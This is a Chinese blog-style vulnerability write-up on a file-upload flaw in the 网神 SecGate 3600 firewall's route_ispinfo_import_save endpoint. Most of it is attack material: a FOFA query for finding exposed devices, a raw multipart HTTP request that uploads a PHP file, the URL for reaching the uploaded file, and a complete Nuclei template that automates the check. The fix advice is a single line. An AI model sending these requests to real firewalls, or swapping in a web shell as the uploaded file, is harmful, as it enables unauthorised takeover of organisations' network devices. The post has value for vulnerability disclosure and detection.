本文主要是介绍网神 SecGate 3600 防火墙 route_ispinfo_import_save 文件上传漏洞,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
Ⅰ、漏洞描述
网神SecGate 3600防火墙是基于状态检测包过滤和应用级代理的复合型硬件防火墙,是专门面向大中型企业、政府、军队、高校等用户开发的新一代专业防火墙设备,支持外部攻击防范、内网安全、网络访问权限控制、网络流量监控和带宽管理、动态路由、网页内容过滤、邮件内容过滤、IP冲突检测等功能,能够有效地保证网络的安全;产品提供灵活的网络路由/桥接能力,支持策略路由,多出口链路聚合;提供多种智能分析和管理手段,支持邮件告警,支持日志审计,提供全面的网络管理监控,协助网络管理员完成网络的安全管理。
网神SecGate 3600防火墙 route_ispinfo_import_save接口处存在文件上传漏洞,恶意攻击者可能利用此漏洞上传恶意文件,最终导致服务器失陷。
Ⅱ、fofa语句
title="网神SecGate 3600防火墙"
Ⅲ、漏洞复现
POC
POST /?g=route_ispinfo_import_save HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="MAX_FILE_SIZE"10000000
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="reqfile"; filename="ceshi.php"
Content-Type: text/plain<?php echo md5('666');unlink(__FILE__);?>
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="submit_post"route_ispinfo_import_save
------WebKitFormBoundaryJpMyThWnAxbcBBQc--
1、构建poc
2、访问
https://127.0.0.1/attachements/ceshi.php
Ⅳ、Nuclei-POC
id: SecGate-3600-route-ispinfo-import-save-Uploadinfo:name: 网神SecGate 3600防火墙 route_ispinfo_import_save接口处存在文件上传漏洞,恶意攻击者可能利用此漏洞上传恶意文件,最终导致服务器失陷。author: WLFseverity: highmetadata: fofa-query: title="网神SecGate 3600防火墙"
variables:filename: "{{to_lower(rand_base(10))}}"boundary: "{{to_lower(rand_base(20))}}"
http:- raw:- |POST /?g=route_ispinfo_import_save HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="MAX_FILE_SIZE"10000000------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="reqfile"; filename="{{filename}}.php"Content-Type: text/plain<?php echo md5('666');unlink(__FILE__);?>------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="submit_post"route_ispinfo_import_save------WebKitFormBoundaryJpMyThWnAxbcBBQc--- |GET /attachements/{{filename}}.php HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0matchers:- type: dsldsl:- status_code==200 && contains_all(body,"fae0b27c451c728867a567e8c1bb4e53")
Ⅴ、修复建议
通过防火墙等安全设备设置访问策略,设置白名单访问
这篇关于网神 SecGate 3600 防火墙 route_ispinfo_import_save 文件上传漏洞的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!